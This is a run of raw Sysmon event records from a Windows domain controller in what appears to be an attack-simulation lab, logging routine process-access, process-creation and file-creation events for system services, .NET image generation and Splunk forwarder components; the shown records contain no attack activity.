13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4512-6000-5001-000000009A01}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4512-6000-5001-000000009A01}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.471{08A6967A-4512-6000-5001-000000009A01}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.423{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4512-6000-4F01-000000009A01}4936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.408{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4512-6000-4F01-000000009A01}4936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.408{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4512-6000-4F01-000000009A01}4936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:18.361{08A6967A-4512-6000-4E01-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\664-0\Accessibility.dll2021-01-14 13:20:18.361 10341000x80000000000000005440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.314{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4512-6000-4E01-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.298{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4512-6000-4E01-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.298{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4512-6000-4E01-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.267{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4512-6000-4D01-000000009A01}1400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.267{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4512-6000-4D01-000000009A01}1400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.267{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4512-6000-4D01-000000009A01}1400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:18.173{08A6967A-4511-6000-4B01-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f50-0\System.Management.dll2021-01-14 13:20:18.173 10341000x80000000000000005475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.220{08A6967A-4513-6000-5201-000000009A01}35523512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4513-6000-5201-000000009A01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 